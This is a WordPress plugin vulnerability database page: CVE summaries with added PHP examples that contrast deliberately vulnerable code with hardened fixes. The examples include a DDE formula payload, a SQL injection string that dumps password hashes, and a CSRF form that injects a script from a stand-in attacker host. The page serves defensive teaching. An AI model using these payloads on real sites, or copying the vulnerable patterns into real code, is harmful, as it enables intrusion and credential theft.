Threat Database

Threat Entry Updated 2024-11-21

CVE-2022-1801 - Very Simple Contact Form Plugin

The Very Simple Contact Form WordPress plugin before 11.6 exposes the solution to the captcha in the rendered contact form, both as hidden input fields and as plain text in the page, making it very easy for bots to bypass the captcha check, rendering the page a likely target for spam bots.

PLUGIN Very Simple Contact Form

CVE-2022-1801

HIGH CVSS 7.5 2022-06-20
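The pattern behind CVE-2022-1801, shown as an added example rather than the Very Simple Contact Form plugin's own code: the server generates a captcha and then writes the answer into the HTML it serves, so any bot can read it back. The hardened version keeps the answer server-side in a short-lived, single-use transient and sends the client only an opaque challenge id. Function names, the transient key prefix and the field names are assumptions for the example.

```php
<?php
// Added example (not the plugin's code). Uses WordPress transient and escaping APIs.

// VULNERABLE: the answer is generated server-side but then emitted into the page,
// both as a hidden input and as visible text. A bot simply copies it into the field.
function vscf_render_captcha_vulnerable(): string {
    $a = random_int(1, 9);
    $b = random_int(1, 9);
    $answer = $a + $b;
    return '<p>What is ' . $a . ' + ' . $b . '? (answer: ' . $answer . ')</p>'
         . '<input type="hidden" name="captcha_answer" value="' . $answer . '">'
         . '<input type="text" name="captcha_input">';
}

// HARDENED: the expected answer never leaves the server. It is stored under a
// random challenge id for ten minutes; only the id and the question reach the client.
function vscf_render_captcha_hardened(): string {
    $a = random_int(1, 9);
    $b = random_int(1, 9);
    $challenge_id = bin2hex(random_bytes(16)); // 32 hex chars, unguessable
    set_transient('vscf_captcha_' . $challenge_id, (string) ($a + $b), 10 * MINUTE_IN_SECONDS);
    return '<p>What is ' . (int) $a . ' + ' . (int) $b . '?</p>'
         . '<input type="hidden" name="captcha_id" value="' . esc_attr($challenge_id) . '">'
         . '<input type="text" name="captcha_input" autocomplete="off">';
}

// Verification consumes the challenge on first use (even on a wrong answer), so a
// solved captcha cannot be replayed by a bot across many submissions.
function vscf_verify_captcha_hardened(array $post): bool {
    $id = isset($post['captcha_id']) ? (string) $post['captcha_id'] : '';
    if (!preg_match('/^[0-9a-f]{32}$/', $id)) {
        return false; // missing or malformed id: never look up a transient with attacker-shaped keys
    }
    $expected = get_transient('vscf_captcha_' . $id);
    delete_transient('vscf_captcha_' . $id); // single use
    if ($expected === false) {
        return false; // unknown, expired, or already consumed
    }
    $given = isset($post['captcha_input']) ? trim((string) $post['captcha_input']) : '';
    // Constant-time comparison so the answer cannot be probed through timing.
    return hash_equals((string) $expected, $given);
}
```

A site that cannot use transients (no persistent object cache, heavy traffic) can instead bind the answer into an HMAC over the challenge id, a timestamp and a server secret; the point in either design is that the page carries nothing from which the answer can be derived.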
Threat Entry Updated 2024-11-21

CVE-2022-1614 - WP-EMail Plugin

The WP-EMail WordPress plugin before 2.69.0 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.

PLUGIN WP-EMail

CVE-2022-1614

HIGH CVSS 7.5 2022-06-20
Threat Entry Updated 2024-11-21

CVE-2022-1472 - Better Find And Replace Plugin

The Better Find and Replace WordPress plugin before 1.3.6 does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL injection.

PLUGIN Better Find And Replace

CVE-2022-1472

HIGH CVSS 7.2 2022-06-20
Threat Entry Updated 2025-05-05

CVE-2022-1969 - Mobile Browser Color Select Plugin

The Mobile browser color select plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the admin_update_data() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Mobile Browser Color Select

CVE-2022-1969

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2025-05-05

CVE-2022-1749 - Find Any Think Plugin

The WPMK Ajax Finder WordPress plugin, in versions up to and including 1.0.1, is vulnerable to Cross-Site Request Forgery via the createplugin_atf_admin_setting_page() function in the ~/inc/config/create-plugin-config.php file, due to a missing nonce check, which allows attackers to inject arbitrary web scripts.

PLUGIN Find Any Think

CVE-2022-1749

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1918 - Toolbar To Share Plugin

The ToolBar to Share plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0. This is due to missing nonce validation on the plugin_toolbar_comparte page. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Toolbar To Share

CVE-2022-1918

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2025-05-05

CVE-2022-1900 - Copify Plugin

The Copify plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.0. This is due to missing nonce validation on the CopifySettings page. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Copify

CVE-2022-1900

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1800 - Export Any WordPress Data To XML/CSV Plugin

The Export any WordPress data to XML/CSV WordPress plugin before 1.3.5 does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.

PLUGIN Export Any WordPress Data To XML/CSV

CVE-2022-1800

HIGH CVSS 7.2 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1777 - Filr Plugin

The Filr WordPress plugin before 1.2.2.1 does not have an authorisation check in two of its AJAX actions, allowing them to be called by any authenticated user, such as a subscriber. They are protected with a nonce, however the nonce is leaked on the dashboard. This could allow such users to upload arbitrary HTML files as well as delete all files or arbitrary ones.

PLUGIN Filr

CVE-2022-1777

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1765 - Hot Linked Image Cacher Plugin

The Hot Linked Image Cacher WordPress plugin through 1.16 is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).

PLUGIN Hot Linked Image Cacher

CVE-2022-1765

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1758 - Genki Pre Publish Reminder Plugin

The Genki Pre-Publish Reminder WordPress plugin through 1.4.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack and lead to Stored XSS as well as RCE when custom code is added via the plugin settings.

PLUGIN Genki Pre Publish Reminder

CVE-2022-1758

HIGH CVSS 8.8 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1791 - One Click Plugin Updater

The One Click Plugin Updater WordPress plugin through 2.4.14 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack and disable or hide the badge for available updates and the related check.

PLUGIN One Click Plugin Updater

CVE-2022-1791

HIGH CVSS 8.1 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1779 - Auto Delete Posts Plugin

The Auto Delete Posts WordPress plugin through 1.3.0 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack and delete specific posts, categories and attachments at once.

PLUGIN Auto Delete Posts

CVE-2022-1779

HIGH CVSS 8.1 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-1762 - iQ Block Country Plugin

The iQ Block Country WordPress plugin before 1.2.20 does not properly check HTTP headers in order to validate the origin IP address, allowing threat actors to bypass its block feature by spoofing the headers.

PLUGIN iQ Block Country

CVE-2022-1762

HIGH CVSS 7.5 2022-06-13
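CVE-2022-1614 (WP-EMail) and CVE-2022-1762 (iQ Block Country) are the same bug: a client-supplied header such as X-Forwarded-For is trusted over REMOTE_ADDR, which the web server fills from the TCP connection and which the client cannot forge. The added example below is not code from either plugin; it shows the vulnerable lookup next to a replacement that only consults forwarding headers when the connection actually comes from one of the site's own reverse proxies. The trusted-proxy list and the two request arrays are constructed for the example.

```php
<?php
// Added example (not code from WP-EMail or iQ Block Country). Plain PHP, runs from the CLI.

// VULNERABLE: every one of these headers is set by whoever sends the request.
// An IP block list, country block or rate limit keyed on this value is bypassed
// by adding one header to the request.
function get_client_ip_vulnerable(array $server): string {
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP'] as $h) {
        if (!empty($server[$h])) {
            return trim(explode(',', $server[$h])[0]);
        }
    }
    return $server['REMOTE_ADDR'] ?? '';
}

// HARDENED: start from REMOTE_ADDR. If the peer is not one of our proxies the
// headers are ignored entirely. If it is, walk X-Forwarded-For from the right
// (proxies append, so the rightmost entries are the ones we added ourselves) and
// take the first address that is not one of our proxies. Everything further left
// was supplied by the client and is untrusted.
function get_client_ip_hardened(array $server, array $trusted_proxies): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    if ($remote === '' || !in_array($remote, $trusted_proxies, true)) {
        return $remote; // direct connection: the socket peer is the client
    }
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        $hop = $chain[$i];
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed header: stop trusting it and fall back to the proxy address
        }
        if (!in_array($hop, $trusted_proxies, true)) {
            return $hop;
        }
    }
    return $remote; // chain contained only our own proxies
}

// Constructed request 1: the attacker at 203.0.113.7 connects directly and forges a
// header claiming to be an internal address.
$forged = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '10.0.0.1',
];
// Constructed request 2: the same attacker, this time through the site's reverse
// proxy at 192.0.2.10, still trying to prepend a bogus hop.
$proxied = [
    'REMOTE_ADDR'          => '192.0.2.10',
    'HTTP_X_FORWARDED_FOR' => '10.0.0.1, 203.0.113.7',
];
$trusted = ['192.0.2.10']; // assumed site setting: addresses of our own proxies

var_dump(get_client_ip_vulnerable($forged));
var_dump(get_client_ip_hardened($forged, $trusted));
var_dump(get_client_ip_hardened($proxied, $trusted));
```

For the forged direct request the vulnerable function hands back the attacker's chosen address while the hardened one returns the socket peer; for the proxied request the hardened function skips the proxy's own hop and lands on the attacker's real address. The trusted-proxy list must be an explicit configuration value, never derived from the request, and must be kept in sync when proxies or CDN ranges change.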
Threat Entry Updated 2024-11-21

CVE-2022-1202 - Wp Crm Plugin

The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability.

PLUGIN Wp Crm

CVE-2022-1202

HIGH CVSS 7.8 2022-06-13
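What CSV injection looks like in an export like WP-CRM's, as an added example that is not the plugin's code: a field value beginning with a formula trigger is written verbatim to the CSV and evaluated when an admin opens the file in a spreadsheet. The record set and function names are constructed for the example.

```php
<?php
// Added example (not WP-CRM code). Plain PHP, runs from the CLI.

// Constructed CRM records. The first "person" was created by an attacker through a
// public form; the name is a classic DDE payload that a spreadsheet will try to run.
$people = [
    ['first_name' => "=cmd|' /C calc'!A0", 'email' => 'mallory@example.com'],
    ['first_name' => 'Alice',              'email' => 'alice@example.com'],
];

// VULNERABLE: raw values straight into the file. fputcsv quotes commas and double
// quotes, which is about CSV syntax; it does nothing about formula evaluation.
function export_people_vulnerable(array $rows): string {
    $out = fopen('php://memory', 'w+');
    fputcsv($out, ['first_name', 'email']);
    foreach ($rows as $r) {
        fputcsv($out, [$r['first_name'], $r['email']]);
    }
    rewind($out);
    return stream_get_contents($out);
}

// HARDENED: a cell that starts with = + - @ or with a tab/CR (which spreadsheets
// tolerate ahead of a formula trigger) gets a leading single quote, so the client
// treats it as text instead of a formula.
function csv_neutralise(string $cell): string {
    if ($cell !== '' && preg_match('/^[\t\r=+\-@]/', $cell)) {
        return "'" . $cell;
    }
    return $cell;
}

function export_people_hardened(array $rows): string {
    $out = fopen('php://memory', 'w+');
    fputcsv($out, ['first_name', 'email']);
    foreach ($rows as $r) {
        fputcsv($out, array_map('csv_neutralise', [$r['first_name'], $r['email']]));
    }
    rewind($out);
    return stream_get_contents($out);
}

echo export_people_vulnerable($people), "\n", export_people_hardened($people);
```

Apply the neutralisation only to free-text columns: a numeric column holding negative amounts should be exported as a number, not a string with a leading minus, or the prefix will corrupt legitimate data. The CVSS here is Local/User Interaction Required because the victim is the admin who opens the export, not the web server.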
Threat Entry Updated 2024-11-21

CVE-2022-1412 - Log Wp Mail Plugin

The Log WP_Mail WordPress plugin through 0.1 saves sent email in a publicly accessible directory using predictable filenames, allowing any unauthenticated visitor to obtain potentially sensitive information like generated passwords.

PLUGIN Log Wp Mail

CVE-2022-1412

HIGH CVSS 7.5 2022-06-13
Threat Entry Updated 2024-11-21

CVE-2022-0863 - Wp Svg Icons Plugin

The WP SVG Icons WordPress plugin through 3.2.3 does not properly validate uploaded custom icon packs, allowing a high-privileged user such as an admin to upload a zip file containing malicious PHP code, leading to remote code execution.

PLUGIN Wp Svg Icons

CVE-2022-0863

HIGH CVSS 7.2 2022-06-13
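The missing check in CVE-2022-0863, as an added example that is not WP SVG Icons code: an "icon pack" archive is extracted into a web-served directory without looking at what it contains, so a zip with a .php entry becomes a web shell. The hardened importer walks the central directory first and refuses the whole archive on any disallowed extension, traversal path or oversize content before a single byte is written. Function names, the extension allow-list and the size cap are assumptions for the example.

```php
<?php
// Added example (not the plugin's code). Plain PHP using ZipArchive.

// VULNERABLE: extractTo() writes every entry as named. pack.zip containing
// icons/shell.php lands under the upload directory and is reachable over HTTP;
// entries named ../../wp-config.php escape the target directory altogether.
function import_icon_pack_vulnerable(string $zip_path, string $dest): bool {
    $zip = new ZipArchive();
    if ($zip->open($zip_path) !== true) {
        return false;
    }
    $ok = $zip->extractTo($dest);
    $zip->close();
    return $ok;
}

// HARDENED: inspect every entry before extracting anything. Reject any file whose
// extension is not on the allow-list (this also rejects .htaccess, which has no
// extension in pathinfo terms), any path that could leave $dest, and any archive
// whose declared uncompressed size exceeds the cap (zip bombs).
function import_icon_pack_hardened(string $zip_path, string $dest, int $max_bytes = 10 * 1024 * 1024): array {
    $allowed = ['svg', 'css', 'woff', 'woff2', 'ttf', 'json']; // assumed icon-pack content types
    $real_dest = realpath($dest);
    if ($real_dest === false) {
        return ['ok' => false, 'reason' => 'destination does not exist'];
    }
    $zip = new ZipArchive();
    if ($zip->open($zip_path) !== true) {
        return ['ok' => false, 'reason' => 'not a zip archive'];
    }
    $total = 0;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $st   = $zip->statIndex($i);
        $name = $st['name'];
        if ($name === '' || substr($name, -1) === '/') {
            continue; // directory entry
        }
        // Lexical path check; done before anything touches the filesystem.
        if (strpos($name, '..') !== false || $name[0] === '/' || strpos($name, "\0") !== false) {
            $zip->close();
            return ['ok' => false, 'reason' => "unsafe path: $name"];
        }
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (!in_array($ext, $allowed, true)) {
            $zip->close();
            return ['ok' => false, 'reason' => "disallowed file type: $name"];
        }
        $total += $st['size'];
        if ($total > $max_bytes) {
            $zip->close();
            return ['ok' => false, 'reason' => 'archive too large when extracted'];
        }
    }
    $ok = $zip->extractTo($real_dest);
    $zip->close();
    return ['ok' => $ok, 'reason' => $ok ? '' : 'extract failed'];
}
```

The allow-list is checked on the final extension only, which is what the web server's handler mapping uses; a name like icon.php.svg is served as SVG, not executed. SVG itself can carry script, so files that pass this gate still need an SVG sanitiser before they are served inline, and the upload directory should deny PHP execution outright as a second layer.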
Threat Entry Updated 2024-11-21

CVE-2022-1683 - Amtythumb Plugin

The amtyThumb WordPress plugin through 4.2.0 does not sanitise and escape a parameter before using it in a SQL statement via its shortcode, leading to an SQL injection. It is exploitable by any authenticated user (not just Author+ as the original advisory mentions), because such users can execute shortcodes via an AJAX action.

PLUGIN Amtythumb

CVE-2022-1683

HIGH CVSS 8.8 2022-06-08
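CVE-2022-1472, CVE-2022-1800 and CVE-2022-1683 all reduce to user input concatenated into a $wpdb query. The added example below is not code from any of those plugins; it shows the export handler pattern of CVE-2022-1800 and the shortcode-attribute pattern of CVE-2022-1683, each beside a version that validates the value and binds it through $wpdb->prepare(). Function names and the cpt, limit and prefix parameters are assumptions for the example; $wpdb, ARRAY_A, sanitize_key(), post_type_exists() and absint() are WordPress core.

```php
<?php
// Added example (not plugin code). Assumes it runs inside WordPress with $wpdb available.

// VULNERABLE: the post type comes straight from POST into the SQL string.
// cpt=x' UNION SELECT user_login, user_pass FROM wp_users -- -
// turns a post export into a credential dump (two columns, matching ID and post_title).
function export_posts_vulnerable() {
    global $wpdb;
    $cpt = $_POST['cpt'] ?? 'post';
    return $wpdb->get_results(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_type = '$cpt'",
        ARRAY_A
    );
}

// HARDENED: validate against the set of registered post types, then bind the value
// with %s so it can only ever be a string literal and never change the query's shape.
function export_posts_hardened() {
    global $wpdb;
    $cpt = sanitize_key($_POST['cpt'] ?? 'post');
    if (!post_type_exists($cpt)) {
        wp_die('Unknown post type', 400);
    }
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_type = %s",
            $cpt
        ),
        ARRAY_A
    );
}

// Shortcode attributes (CVE-2022-1683) are the same sink with a different entry
// point: whoever can render the shortcode controls the attribute, and the
// admin-ajax.php parse-media-shortcode action lets low-privileged users do that.
// Numbers go through absint() and %d; LIKE patterns also need esc_like(), because
// prepare() quotes the value but does not escape the % and _ wildcards.
function amty_recent_images_hardened(array $atts) {
    global $wpdb;
    $limit  = min(absint($atts['limit'] ?? 10), 100);
    $prefix = sanitize_text_field($atts['prefix'] ?? '');
    $like   = $wpdb->esc_like($prefix) . '%';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, guid FROM {$wpdb->posts}
              WHERE post_type = 'attachment' AND post_title LIKE %s
              ORDER BY post_date DESC LIMIT %d",
            $like,
            $limit
        ),
        ARRAY_A
    );
}
```

Table and column names cannot be bound with prepare(); when those come from input, map them through a fixed allow-list before interpolation rather than escaping them.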
Threat Entry Updated 2026-01-14

CVE-2022-1589 - Change Wp Admin Login Plugin

The Change wp-admin login WordPress plugin before 1.1.0 does not properly check for authorisation and is also missing a CSRF check when updating its settings, which could allow unauthenticated users to change the settings. The attack could also be performed via a CSRF vector.

PLUGIN Change Wp Admin Login

CVE-2022-1589

HIGH CVSS 7.5 2022-05-30
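Most of the entries on this page (CVE-2022-1969, -1749, -1918, -1900, -1765, -1758, -1791, -1779 and -1589 for settings handlers; CVE-2022-1777 for AJAX actions) are the same missing pair of checks: a capability check that answers "may this user do this?" and a nonce check that answers "did this request originate from our own form?". The added example below is not code from any listed plugin; it shows a settings handler with neither check, the hardened form and handler, and an AJAX action that checks both. Option names, action names, the demo_ prefix and the manage_options capability choice are assumptions for the example.

```php
<?php
// Added example (not plugin code). Assumes it is loaded as a WordPress plugin.

// VULNERABLE: runs on every admin page load, stores whatever arrives in POST, and
// checks neither who sent it nor where it came from. A page on attacker.example with
//   <form method="POST" action="https://victim.example/wp-admin/options-general.php?page=demo">
//     <input name="demo_footer_html" value="&lt;script src=//attacker.example/x.js&gt;&lt;/script&gt;">
//   </form><script>document.forms[0].submit()</script>
// stores XSS the moment a logged-in admin visits it. That is the 8.8 CSRF-to-XSS chain.
function demo_save_settings_vulnerable() {
    if (isset($_POST['demo_footer_html'])) {
        update_option('demo_footer_html', $_POST['demo_footer_html']);
    }
}
add_action('admin_init', 'demo_save_settings_vulnerable');

// HARDENED form: wp_nonce_field() emits a token bound to this action and the current
// user's session. A cross-origin page can neither read nor guess it.
function demo_settings_page_hardened() {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', 403);
    }
    echo '<form method="post">';
    wp_nonce_field('demo_save_settings', 'demo_nonce');
    echo '<textarea name="demo_footer_html">'
       . esc_textarea(get_option('demo_footer_html', ''))
       . '</textarea>';
    submit_button('Save');
    echo '</form>';
}
add_action('admin_menu', function () {
    add_options_page('Demo', 'Demo', 'manage_options', 'demo', 'demo_settings_page_hardened');
});

// HARDENED handler: authorisation first, then provenance, then sanitisation.
// check_admin_referer() dies on a bad or missing nonce, so no code path writes the
// option for a forged request. wp_kses_post() strips script tags, event handler
// attributes and javascript: URLs from the stored HTML.
function demo_save_settings_hardened() {
    if (!isset($_POST['demo_footer_html'])) {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', 403);
    }
    check_admin_referer('demo_save_settings', 'demo_nonce');
    update_option('demo_footer_html', wp_kses_post(wp_unslash($_POST['demo_footer_html'])));
}
add_action('admin_init', 'demo_save_settings_hardened');

// AJAX actions need the same two checks (CVE-2022-1777). A nonce proves the request
// came from a page we rendered; it says nothing about the caller's role, and if the
// nonce is printed on a dashboard every role can see, subscribers have it too.
function demo_ajax_delete_file_hardened() {
    check_ajax_referer('demo_delete_file', 'nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    $id = absint($_POST['file_id'] ?? 0);
    wp_delete_attachment($id, true);
    wp_send_json_success(['deleted' => $id]);
}
add_action('wp_ajax_demo_delete_file', 'demo_ajax_delete_file_hardened');
```

The order is deliberate: the capability check is the authorisation control and must not be replaced by the nonce check, and the nonce check must not be replaced by checking is_admin(), which is true for any request to a wp-admin URL regardless of who sent it.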